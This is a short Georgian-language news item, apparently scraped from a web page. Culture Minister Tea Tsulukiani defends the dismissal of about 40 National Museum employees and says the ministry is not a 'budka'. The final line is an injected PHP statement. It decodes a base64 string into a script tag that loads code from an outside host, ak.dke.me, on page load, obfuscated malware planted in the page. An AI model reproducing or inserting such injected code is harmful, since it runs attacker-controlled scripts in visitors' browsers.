celsiusi
ავერსი საქკაბელი
კულტურის მინისტრი, თეა წულუკიანი ამბობს, რომ სამინისტრო "ბუტკა" არაა. ასე გამოეხმაურა ის მუზეუმიდან თანამშრომლების გათავისუფლებას.
 
"ეს გახლავთ სამინისტრო და არა რაიმე კერძო კომპანია ან, ბოდიშს ვიხდი გამოთქმისთვის, "ბუტკა". ეს არის საჯარო ორგანიზაციები, დაახლოებით 100-მდე, რომლებსაც კულტურის სამინისტრო მართავს და ძალიან მნიშვნელოვანია, რომ თანამშრომელი, რომელიც ხელფასს იღებს, მინიმუმ სამსახურში დადიოდეს. როდესაც დადის და თუ დადის სამსახურში, მას ჰქონდეს იმის უნარი, რომ საკუთარ საჯარო პასუხისმგებლობას  კომპეტენტურად გაუსწოროს თვალი. მხარდაჭერას ვუცხადებ ახალ ხელმძღვანელობას, იქნება ეს ხელოვნების მუზეუმში თუ სიმონ ჯანაშიას სახელობის მუზეუმში", - თქვა წულუკიანმა ჟურნალისტებთან. 
 
საქართველოს მეცნიერების, განათლებისა და კულტურის მუშაკთა პროფესიული კავშირის ინფორმაციით, 24 მაისს ეროვნული მუზეუმიდან 40-მდე თანამშრომელი გაათავისუფლეს.
648
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");